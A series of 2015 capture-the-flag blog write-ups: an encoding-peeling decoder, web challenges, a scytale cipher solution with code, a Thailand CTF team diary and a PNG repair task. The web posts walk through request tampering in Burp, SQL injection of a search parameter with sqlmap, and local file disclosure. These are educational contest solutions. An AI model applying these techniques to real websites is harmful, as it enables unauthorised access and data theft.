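    """Recognise one encoding layer and strip it; None when no rule matches cleanly."""
    s = data.strip()
    try:
        if re.fullmatch(r"(0x[0-9a-fA-F]{2}[,\s]*)+", s):                   # 0x46, 0x4c, ... (step 7)
            return _text(bytes(int(t, 16) for t in re.findall(r"0x([0-9a-fA-F]{2})", s)))
        if re.fullmatch(r"(?:[0-9a-fA-F]{2})+", s):                         # 464c41...      (step 8)
            return _text(bytes.fromhex(s))
        if re.fullmatch(r"\d{1,3}(\s+\d{1,3})*", s):                        # 70 76 65 ...   (step 6)
            return _text(bytes(int(t) for t in s.split()))
        if re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s) and len(s) % 4 == 0:    # base64         (step 5)
            return _text(base64.b64decode(s, validate=True))
    except ValueError:          # byte > 255, bad padding and similar: not this layer
        return None
    return None


def peel(data: str, max_layers: int = 10):
    """Peel layers until nothing matches; returns (text, number_of_layers_removed)."""
    layers = 0
    while layers < max_layers:
        nxt = peel_once(data)
        if nxt is None:
            break
        data, layers = nxt, layers + 1
    return data, layers


if __name__ == "__main__":
    for sample in (
        "464c41475f4730445f44414d4e5f4252305f555f525f53305f4330304c5f444543525950544f52",
        "70 76 65 71 95 71 48 68 95 68 65 77 78 95 66 82 48 95 85 95 82 95 83 48 95 67 48 48 76 95 68 69 67 82 89 80 84 79 82",
        "YSA9ICc3MCA3Nic=",   # constructed: base64 of the first characters of the Python source
    ):
        print(peel(sample))
```

Ordering matters: a string of hex digits without spaces is tried as hex before decimal, and a decoded result is only accepted when it is printable, which is what stops the loop from "decoding" the flag itself a second time as base64.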
<b>Flag:</b> <b><span style="color: red;">FLAG_G0D_DAMN_BR0_U_R_S0_C00L_DECRYPTOR</span></b><br />
<div>
<b><br /></b></div>
</div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-79793936479773934012015-11-04T20:21:00.000+07:002015-11-04T23:24:53.173+07:00School CTF 2015: Hunger games (Web) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
Oh, that monkey is really annoying, can you feed it please?</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. The monkey wants a banana, but banana is not among the choices.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixW9FcBWlbdAGH0csLpW-6KPG967fbJfwZqtjo5dTODL-LI-J-veMHcoGv_9pOdvIDZq2iXBCVmAH4QZrbsqBHwYLkk-EZqTakOh7Kml13ivBR8rmQTf76HW_qoQ3MBtlejtCUfI_o2SAx/s1600/banana1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="165" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEixW9FcBWlbdAGH0csLpW-6KPG967fbJfwZqtjo5dTODL-LI-J-veMHcoGv_9pOdvIDZq2iXBCVmAH4QZrbsqBHwYLkk-EZqTakOh7Kml13ivBR8rmQTf76HW_qoQ3MBtlejtCUfI_o2SAx/s400/banana1.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
2. Send a banana to the monkey with <a href="https://portswigger.net/burp/">Burp Suite</a>. :3</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbfRFNhTb2gDwqtvS8bcFVUY0wnBiP3dqO356bEp_7vpAUulEiED8ZYELvl_ox9nRJjghKHRDk5yKEkCN8LgGEjKDC2E_XmY9Mr00VJYqJbaOcN2E9NsQEsDB70MpsGw2vWN85_fr4jpXl/s1600/sendbanana.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="167" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbfRFNhTb2gDwqtvS8bcFVUY0wnBiP3dqO356bEp_7vpAUulEiED8ZYELvl_ox9nRJjghKHRDk5yKEkCN8LgGEjKDC2E_XmY9Mr00VJYqJbaOcN2E9NsQEsDB70MpsGw2vWN85_fr4jpXl/s400/sendbanana.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Flag:</b> <b><span style="color: red;">l375_$7ar7_w3b_h4ck5</span></b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-13031007914887539942015-10-25T20:05:00.001+07:002015-10-25T20:05:11.636+07:00TUM CTF Teaser: webshop (Web) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
Well, I found this shop and their offers are quite awesome, but something here smells... fishy. 1.ctf.link:1124</blockquote>
<b>Solution: </b><br />
<b><br /></b>
1. Access <a href="http://1.ctf.link:1124/">http://1.ctf.link:1124</a> and look around; I found that the site uses a free web template from freewebsitetemplates.com.<br />
<br />
2. I tried view-source to find something interesting but found nothing; I think it is just a static website.<br />
<br />
3. The search form, whose action is search.php, looks interesting.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCHJ-5JuxLjea_S1C1L2sMiGuRbtAUOb6PURXKZsgkNy2ibnM-DV6oKFqKpnqLT-zVcWkBk370KgZzLjEhGdtUGBymX2kEE6QDJwNHML-uhi5FHJ-mupwBtXyII25_PELj4mO4UdrvFh3x/s1600/search1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCHJ-5JuxLjea_S1C1L2sMiGuRbtAUOb6PURXKZsgkNy2ibnM-DV6oKFqKpnqLT-zVcWkBk370KgZzLjEhGdtUGBymX2kEE6QDJwNHML-uhi5FHJ-mupwBtXyII25_PELj4mO4UdrvFh3x/s400/search1.PNG" width="400" /></a></div>
<br />
<br />
4. It should have a <b>name="search"</b>, right? But it only has <b>value="search"</b>.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkE4tBBgfG0CerDZwN-eD2RureOLfbz8Zz5usFE8u_uFsvhTNCbL63xXGgGLySObecDLJpie-0CwRbkvJi9rK2Zl5AiQNvV6-A9d7eUabsQKfTkGt1LLuiBhiFcgXioX0yuzJ6H9MFpvOs/s1600/source.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="125" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkE4tBBgfG0CerDZwN-eD2RureOLfbz8Zz5usFE8u_uFsvhTNCbL63xXGgGLySObecDLJpie-0CwRbkvJi9rK2Zl5AiQNvV6-A9d7eUabsQKfTkGt1LLuiBhiFcgXioX0yuzJ6H9MFpvOs/s400/source.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
5. I tried a search and intercepted the request with <a href="https://portswigger.net/burp/">Burp Suite</a>; the value I typed into the search box was not in the request. :)</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCiFo_7wyB84Ztyxv0HAsooJuAQwL7LOcFPdnvOUY6giHA2ys5PB7Sdhe5pTjSB0Gn47W3umTBdYoV6vpbH6ajIqnp24MnidVBNzdDN9MQkdf_GOZlPllFd0dsdqwgHQ4j59NcD3Ry2FMv/s1600/burp.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="264" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgCiFo_7wyB84Ztyxv0HAsooJuAQwL7LOcFPdnvOUY6giHA2ys5PB7Sdhe5pTjSB0Gn47W3umTBdYoV6vpbH6ajIqnp24MnidVBNzdDN9MQkdf_GOZlPllFd0dsdqwgHQ4j59NcD3Ry2FMv/s400/burp.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
6. Add a <b>search</b> parameter to the POST request and copy the whole request to webshop.txt.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2dvLUkqW3jtC9CV1v3v1ptxvAyAqtGoCHDQEPUPYETISz17Zlaf65EYclYuFstnvMLObpWobXiZ7GgfSa48p1GPh47wdN6XUseI0AYLVhXmIQ-mAYbPI2UcGFBuT9fN9c_iuNMvAParfH/s1600/search.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2dvLUkqW3jtC9CV1v3v1ptxvAyAqtGoCHDQEPUPYETISz17Zlaf65EYclYuFstnvMLObpWobXiZ7GgfSa48p1GPh47wdN6XUseI0AYLVhXmIQ-mAYbPI2UcGFBuT9fN9c_iuNMvAParfH/s400/search.PNG" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
7. Use <a href="http://sqlmap.org/">sqlmap</a> with the -r option to load the HTTP request from the file and -p "search" to inject into the search parameter.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvPZY6cIiKBqmB07ssqZtK7tlUkJMZ2kXJbx2Xpv4GLLA1vl6V2fbycAQtgBX7CZn-RVKBnZDDP56hYOPZXPuEOjV1WsWqUrPHgr8ccWSpg_elJhWbogIdHU0NOJGCmO5np_2SKAUp9cOX/s1600/sqlmap1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhvPZY6cIiKBqmB07ssqZtK7tlUkJMZ2kXJbx2Xpv4GLLA1vl6V2fbycAQtgBX7CZn-RVKBnZDDP56hYOPZXPuEOjV1WsWqUrPHgr8ccWSpg_elJhWbogIdHU0NOJGCmO5np_2SKAUp9cOX/s320/sqlmap1.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
8. SQL injection vulnerability found in the search parameter!! Find the tables and columns, dump the data and get the flag!</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKaU2hTxQ-uv9qjhcAdRdYr_fVI0taBW0PT6bRpYuSZRKtjlE8HT8UUO4Uqw-gGnUfv4q-9aeD-RuKUac_o2rXBPzQZG-jzN9Fs1SkRSyhy4oKfUN8Ue24OzOeVYFORWYYNnE11oZTTdv2/s1600/sqlmap2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="140" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKaU2hTxQ-uv9qjhcAdRdYr_fVI0taBW0PT6bRpYuSZRKtjlE8HT8UUO4Uqw-gGnUfv4q-9aeD-RuKUac_o2rXBPzQZG-jzN9Fs1SkRSyhy4oKfUN8Ue24OzOeVYFORWYYNnE11oZTTdv2/s320/sqlmap2.PNG" width="320" /></a></div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
<b>Flag:</b> <b><span style="color: red;">hxp{this_is_just_a_place_holder}</span></b></div>
ICheer_No0Mhttp://www.blogger.com/profile/06070190416176409719noreply@blogger.com0tag:blogger.com,1999:blog-9154377361493966397.post-47727674440761649802015-10-25T20:05:00.000+07:002015-10-25T20:05:00.127+07:00TUM CTF Teaser: neocities (Web) Write-up<b>Description:</b><br />
<blockquote class="tr_bq">
So I hope you're well insured, because the nineties have sent us their best thing ever: bright colors and Comic Sans MS. Please end it before everyone dies due to internal bleedings. 1.ctf.link:1123</blockquote>
<b>Solution: </b><br />
<b><br /></b>
The <b>page</b> parameter is vulnerable to Local File Disclosure.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH1XFG8kY53BCWsZtc2ASEMOqbnpqDIX_d0z21CZGafeTAGGFLH3upENyVOH185RCK3LJvfuSS88xMka0MFciQRgA6Vkz-jxryGcX5rPb5WOQqy6HoMjRKNYnGYHWAwxqK-tpsEEZ57Uby/s1600/neo.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjH1XFG8kY53BCWsZtc2ASEMOqbnpqDIX_d0z21CZGafeTAGGFLH3upENyVOH185RCK3LJvfuSS88xMka0MFciQRgA6Vkz-jxryGcX5rPb5WOQqy6HoMjRKNYnGYHWAwxqK-tpsEEZ57Uby/s400/neo.PNG" width="400" /></a></div>
<br />
<b>Flag:</b> <span style="color: red;"><b>hxp{the_nineties_called_they_want_their_design_back}</b></span>
<h3><b>EKOPARTY CTF 2015: SCYTCRYPTO (Crypto) Write-up</b></h3>
Published 2015-10-24 by ICheer_No0M<br />
<b>Description:</b><br />
<blockquote class="tr_bq">
Decrypt this strange word: ERTKSOOTCMCHYRAFYLIPL</blockquote>
<b>Solution:</b><br />
<br />
Taking every third letter of the ciphertext, starting at offsets 0, 1 and 2 in turn, reassembles the plaintext:<br />
<span style="color: red;">E</span>RT<span style="color: red;">K</span>SO<span style="color: red;">O</span>TC<span style="color: red;">M</span>CH<span style="color: red;">Y</span>RA<span style="color: red;">F</span>YL<span style="color: red;">I</span>PL<br />
EKO{MYFI<br />
<span style="color: red;">_</span><span style="color: red;">R</span>T<span style="color: red;">_</span><span style="color: red;">S</span>O<span style="color: red;">_</span><span style="color: red;">T</span>C<span style="color: red;">_</span><span style="color: red;">C</span>H<span style="color: red;">_</span><span style="color: red;">R</span>A<span style="color: red;">_</span><span style="color: red;">Y</span>L<span style="color: red;">_</span><span style="color: red;">P</span>L<br />
EKO{MYFIRSTCRYP<br />
<span style="color: red;">__T__O__C__H__A__L__L</span><br />
EKO{MYFIRSTCRYPTOCHALL}<br />
<br />
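The transposition above is a scytale: the key is the number of faces on the rod (3 here), and letters that sit on the same face are 3 positions apart on the strip. The following Python is an added example, not code from the original write-up; it decrypts and re-encrypts with that key and recovers the key by trying every face count that divides the ciphertext length, keeping the one whose output starts with the event's flag prefix. The prefix EKO and the brace wrapping are assumptions taken from the final flag.

```python
CIPHERTEXT = "ERTKSOOTCMCHYRAFYLIPL"  # from the challenge description
FLAG_PREFIX = "EKO"                    # assumed from the event's flag format


def scytale_decrypt(ciphertext: str, faces: int) -> str:
    """Letters on the same rod face are `faces` apart on the strip; collect each face in turn."""
    return "".join(ciphertext[i::faces] for i in range(faces))


def scytale_encrypt(plaintext: str, faces: int) -> str:
    """Inverse: write the plaintext in `faces` rows of equal length and read it column by column."""
    if len(plaintext) % faces:
        raise ValueError("plaintext length must be a multiple of the number of faces")
    row_len = len(plaintext) // faces
    rows = [plaintext[r * row_len:(r + 1) * row_len] for r in range(faces)]
    return "".join(rows[r][c] for c in range(row_len) for r in range(faces))


def brute_force(ciphertext: str, prefix: str):
    """Try every face count that divides the length; return (faces, plaintext) pairs that start with prefix."""
    n = len(ciphertext)
    hits = []
    for faces in range(1, n + 1):
        if n % faces:
            continue
        candidate = scytale_decrypt(ciphertext, faces)
        if candidate.startswith(prefix):
            hits.append((faces, candidate))
    return hits


def to_flag(plaintext: str, prefix: str) -> str:
    """Wrap the decrypted text in the assumed flag format PREFIX{...}."""
    if not plaintext.startswith(prefix):
        raise ValueError("plaintext does not start with the flag prefix")
    return f"{prefix}{{{plaintext[len(prefix):]}}}"


if __name__ == "__main__":
    for faces, plaintext in brute_force(CIPHERTEXT, FLAG_PREFIX):
        print(faces, to_flag(plaintext, FLAG_PREFIX))
```

Trying only the divisors works because the challenge strip has no padding; a padded scytale would need the candidate row length tried for every key instead.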
<b>Flag:</b> <span style="color: red;"><b>EKO{MYFIRSTCRYPTOCHALL}</b></span>
<h3><b>Team null's experience at the Thailand CTF Competition 2015</b></h3>
Published 2015-10-14 by ICheer_No0M<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgieqr0IPXtxMd2aL4f0Mf5VRRrfDKzWmDl9aUPQLONdcIFeQiZ3d9vj2VWlcX_lY6fXl02VxCyFl2-YhgD95u43dfce5prOYO80yL8Bo67cHnLmwAo4xADqPTCo0x3b3UOUZ9Hf-nh7chJ/s1600/warroom.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="147" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgieqr0IPXtxMd2aL4f0Mf5VRRrfDKzWmDl9aUPQLONdcIFeQiZ3d9vj2VWlcX_lY6fXl02VxCyFl2-YhgD95u43dfce5prOYO80yL8Bo67cHnLmwAo4xADqPTCo0x3b3UOUZ9Hf-nh7chJ/s400/warroom.jpg" width="400" /></a></div>
<b><br /></b>
<br />
<h3>
<b>CTF WTF?</b></h3>
<br />
CTF stands for Capture The Flag[1]. It is a computer security competition, and the two types seen most often are Jeopardy, a question-and-answer style in which you solve challenges to obtain a Flag, a string that serves as the key to unlock that challenge, with each challenge worth points according to its difficulty and spread across many categories; and Attack-Defense, an offensive and defensive hacking competition, meaning you hack other teams' machines to obtain Flags while at the same time defending your own machine from being hacked. See <a href="https://www.youtube.com/watch?v=khXl3DHB_fI">this video</a> for more details[2]<br />
<b><br /></b>
<br />
<h3>
<b>Beside the point</b></h3>
<br />
Personally I play CTFs fairly often, following the competitions on <a href="https://ctftime.org/">https://ctftime.org/</a> when I have time, and every time I play I write an English Write-up of some of the challenges on <a href="http://icheernoom.blogspot.com/search/label/ctf">this blog</a>[3]<br />
This was my second hacking competition; the first was <a href="http://icheernoom.blogspot.com/2014/05/my-first-web-security-contest.html">FITWHEY</a>'s[4], a web hacking contest where I never found a website to hack, only other contestants' machines. Ugh.<br />
<br />
<h3>
<b>Member of null team</b></h3>
<div>
<br /></div>
- Me, Noom (icheernoom)<br />
- Pee (pe3z)<br />
- Nai (ziperz)<br />
<h3>
<b><br /></b></h3>
<h3>
<b>Qualification Round (Online)</b></h3>
<br />
The Online round started on 5 September at 11:00. We had agreed to play at the NE8T cafe, but Nai was sick, so he worked on the challenges from his room and we kept in touch through a Facebook group chat. Pee and I sat at NE8T, ordered something to eat, got the wifi password, found seats near a power outlet and set up our computers. When the competition started we had a small problem logging in, so I phoned in to have the password changed, which let us enter the competition. Then we wrote what we had done in a Google Doc so everyone could see who had done what, and kept helping each other with the challenges. We got stuck on the image challenge: after fixing the file signature, or magic number, to make it a jpg, we opened the image, ran it through Google image search, recognised the place and answered Colorado State Capitol, but it was wrong and we ran out of answers to try, orz. We still don't know what the real answer was. Pee opened with the audio file challenge, and I handled the single Web challenge. For the Access Log challenge the Flag was the sha256 of the timestamp at which a shell was uploaded to the server; when I found the timestamp I thought was right I put it into an online sha256 site and the answer kept coming back wrong. I figured the site was the problem, and after switching to another sha256 site the answer was accepted straight away. I don't remember which site anymore -..- Nai dug through the challenge with 2 flags concatenated together plus various others, and we helped each other along. During the competition Pee said he wanted to climb up to just behind team Pwnladin, which I wanted too, but we were already trying our hardest and couldn't get there, haha.<br />
Pee and I stayed at NE8T until about 8 pm and then went our separate ways, but I think Pee went back and kept going, solving about 2 more challenges without sleeping. I went home to sleep, got up and worked from 7 am until time ran out without solving anything more, and at 11:00 on 6 September the Online round ended.<br />
We finished with 950 points, in 7th place out of 8 teams, very nearly not getting through the first round. Not long after, an email arrived asking us to confirm our identities and to schedule a Skype call with the ThaiCERT staff; when the time came we used Google Hangouts instead because of problems with Skype.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDU_8bIBm8-G4yQ6Bjbyj6_LQbI1JeQOE-v-SRm3EzWdNzdtRE1ztGIpcbirJc3XSsomzVzCw57cTGO8xC1s4K_RPyYWF2HlZpCVbPMVkiGNbelZPFB9EVaoalyjp3TY48LwUb5ARrlnV1/s1600/Qual.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="185" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjDU_8bIBm8-G4yQ6Bjbyj6_LQbI1JeQOE-v-SRm3EzWdNzdtRE1ztGIpcbirJc3XSsomzVzCw57cTGO8xC1s4K_RPyYWF2HlZpCVbPMVkiGNbelZPFB9EVaoalyjp3TY48LwUb5ARrlnV1/s400/Qual.png" width="400" /></a></div>
<br />
<h3>
<b>Final Round (Onsite)</b></h3>
<br />
On the afternoon of Sunday 4 October, team null met in hotel room 2022, since we could already check in and a staff member was there to welcome us. At first we did not know the challenges were Jeopardy style; we thought it would be Attack-Defense. Earlier we had seen an email from the organizers saying VMware and a DVD drive were required; Nai's machine and mine have no DVD drive, so we phoned the organizers and were told it didn't matter if we had none. Because VMware was required we assumed it would be the style where you are given a VM image and keep digging for Flags, so everyone read only Vulnhub write-ups, which are CTFs where you get a VMware image, boot it and do whatever it takes to get the Flag, and from what we read all of them require rooting the machine. When we later learned it was a Jeopardy competition we felt somewhat relieved, ha, and everyone sat down to devour the SECCON CTF 2014 write-ups instead.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-xtEwTu7Lt3BnJ8NstrFbWeWPdZ0MNe43quoRZv_tFO6jRYE2Q0g7FLRAcscjyysQHAaOwRBgA0j2MAtj9Oy_daOz0q9WF9l6KMYcy6Orgs8rqZhajIwTjKMUn9wS0sqo39JuZGeMy9Yh/s1600/hotel.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-xtEwTu7Lt3BnJ8NstrFbWeWPdZ0MNe43quoRZv_tFO6jRYE2Q0g7FLRAcscjyysQHAaOwRBgA0j2MAtj9Oy_daOz0q9WF9l6KMYcy6Orgs8rqZhajIwTjKMUn9wS0sqo39JuZGeMy9Yh/s400/hotel.jpg" width="400" /></a></div>
<br />
<br />
On the morning of 5 October the organizers briefed us on what we would have to do the next day and which activities there were, and introduced the SECCON team who designed the challenges; they asked us not to publish write-ups yet because the same challenges would be used in another 3 or 4 countries (I couldn't hear clearly, they spoke English with a Japanese accent). I had personally taken part in the SECCON CTF 2014 Online round and written a <a href="http://icheernoom.blogspot.com/search/label/SECCON%20CTF%202014">Write-up</a>[5]. In the afternoon we held a team meeting and prepared tools and programs, asking around the team whether everyone had Kali, Burp Suite, a wordlist for brute force, etc., which everyone did. At noon the organizers handed out free T-shirts in the sizes we had given at identity confirmation and provided food, some kind of Oishi set, I don't remember which, but probably expensive. After eating we read write-ups we thought might resemble tomorrow's challenges and shared write-ups from other events that we found interesting with the other members of the team.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1V5zInBqkCqk11mYb004Kqs89543hv9Zgih4Jk7TlUgDxHYkQT5M0Ab6YkLsLL4Np26c-0cVoD59cZ6LJOBaWet2HgrEGomt8eYlxa6uWvBAkNzVCycQ8tQ8mMy3dhD133TWmvAh08gm2/s1600/nullteam.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1V5zInBqkCqk11mYb004Kqs89543hv9Zgih4Jk7TlUgDxHYkQT5M0Ab6YkLsLL4Np26c-0cVoD59cZ6LJOBaWet2HgrEGomt8eYlxa6uWvBAkNzVCycQ8tQ8mMy3dhD133TWmvAh08gm2/s400/nullteam.jpg" width="400" /></a></div>
<br />
The morning of 6 October was competition day at The 9th Towers. In the morning we attended the opening ceremony of Security Health Check Day, and the competition was held in another room. It started at about 10:00; we sat at a round table, as if in a circle. I was very nervous and hungry too, since I had only had milk and bread, and I didn't get to eat until the competition was over: pizza.<br />
When the competition started the organizers gave each of us a LAN cable; plugging it in gave us an IP right away because it was DHCP. Once we had an IP we went to the website the organizers had prepared. I played on 2 VMware machines, the Ubuntu I normally use and a Kali 2.0 prepared specifically for this event, so I set the Network Adapter to Bridged connection to reach the outside network.<br />
After working for a while, since I mostly do Web challenges, we agreed that whenever a Web challenge appeared I would handle it, Nai would focus on Network challenges, and Pee would focus on Forensics and Binary. The Final round challenges seemed easier than the Qualification round ones; the difficulty of the two rounds is inversely proportional to the time available, because if they were too hard we might not finish in time. Not all challenges were open at once: the first time we saw them there were about 10, and then roughly 5 more came at a time until all 29 were out, with a staff member (a Japanese one) walking over to tell us new challenges were available. There was a bonus for the first team to solve a challenge, 1% of that challenge's points: the first team to solve a 100-point challenge got 1 bonus point, a 200-point challenge 2 bonus points, and so on. Nobody in our team ever earned a bonus, because we were never ahead of the other teams, lol -*- During the competition the Scoreboard was moving constantly, which made it even more exciting. Team null's score climbed as high as 2nd place, just behind Pwnladin, early on, and then dropped steadily, lol.<br />
We finished the competition having solved 23 challenges for 2710 points, in 5th place out of 8 teams.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNAOItS7Kk2dB_7qPWZtxVC-QaVzt7FT-bnIVSeZH7NtNAhGz64b4E6Qh8NX9kXPIEEN8ZqPc1bZ2LqCVUSipUsvfjg1Ozuv5biQgnPct43VYAI2f4Zd3hO_E7dLGVVgqATjsxuVxB0Hiz/s1600/Final.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="136" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNAOItS7Kk2dB_7qPWZtxVC-QaVzt7FT-bnIVSeZH7NtNAhGz64b4E6Qh8NX9kXPIEEN8ZqPc1bZ2LqCVUSipUsvfjg1Ozuv5biQgnPct43VYAI2f4Zd3hO_E7dLGVVgqATjsxuVxB0Hiz/s400/Final.png" width="400" /></a></div>
<br />
<h3>
<b>Questions Solved by null team</b></h3>
<br />
<script src="https://gist.github.com/icheernoom/e228390841bbdb231a58.js"></script>
<br />
<h3>
<b>After Competition</b></h3>
<b><br /></b>
After the competition came the awards: the winner was team Pwnladin and the runner-up was team asdfghjkl, while team null received an honorable mention with a certificate and 10,000 baht in prize money. Afterwards there was a party with food, very fancy as well. The MC was very funny; there was an introduction game among the 8 participating teams, trying to remember the names of almost 24 people.<br />
<br />
<h3>
<b>Summary</b></h3>
<br />
Many thanks to ThaiCERT, ETDA and SECCON for organizing such a fun competition; if it is held again next year I will definitely compete again. And congratulations to team Pwnladin and team asdfghjkl on representing Thailand at the Cyber SEA Game in Indonesia.<br />
<br />
<h3>
<b>Reference</b></h3>
<br />
1. <a href="https://ctftime.org/ctf-wtf/">CTF? WTF?</a><br />
2. <a href="https://www.youtube.com/watch?v=khXl3DHB_fI">What is a CTF hacking competition?</a><br />
3. <a href="http://icheernoom.blogspot.com/search/label/ctf">http://icheernoom.blogspot.com/search/label/ctf</a><br />
4. <a href="http://icheernoom.blogspot.com/2014/05/my-first-web-security-contest.html">My first web security contest (FITWHEY + HyperHackathon)</a><br />
5. <a href="http://icheernoom.blogspot.com/search/label/SECCON%20CTF%202014">SECCON CTF 2014</a>
<h3><b>D-CTF 2015: She said it doesn't matter (Misc) Write-up</b></h3>
Published 2015-10-03 by ICheer_No0M<br />
<div class="separator" style="clear: both; text-align: left;">
<b>Description:</b></div>
<blockquote class="tr_bq" style="clear: both; text-align: left;">
Void. Empty. Null.</blockquote>
<b>Solution:</b><br />
<b><br /></b>
1. Download m100.png and open it with the default image viewer; I found an IHDR CRC error.<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWpgmiY-YbVAwxWNG8PGhlpMtnZ_arA-EzynqmcqMN68x-ySns9QYwz1hitzx1wVfsYAi1tPudN1pvLUvw4P5FNWBCYyULl64u7u9S9H7f2Pr7KFWMk3bzNNTYxCpWR-Fo6imv4nqhz-o7/s1600/m100.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="353" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWpgmiY-YbVAwxWNG8PGhlpMtnZ_arA-EzynqmcqMN68x-ySns9QYwz1hitzx1wVfsYAi1tPudN1pvLUvw4P5FNWBCYyULl64u7u9S9H7f2Pr7KFWMk3bzNNTYxCpWR-Fo6imv4nqhz-o7/s400/m100.png" width="400" /></a></div>
<br />
2. Check m100.png with <a href="http://www.libpng.org/pub/png/apps/pngcheck.html">pngcheck</a>; the result is below:<br />
<pre class="brush:[bash]; highlight: 5;">root@ubuntu:~# pngcheck -v m100.png
File: m100.png (65141 bytes)
chunk IHDR at offset 0x0000c, length 13
666 x 519 image, 32-bit RGB+alpha, non-interlaced
CRC error in chunk IHDR (computed 3ff4fc62, expected 35468913)
</pre>
<br />
3. Change the <a href="http://www.w3.org/TR/PNG/#11IHDR">IHDR CRC value</a> from 35468913 to 3ff4fc62 in the <a href="https://hex.it/">HexEd.it</a> online hex editor.<br />
<br />
Default value:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
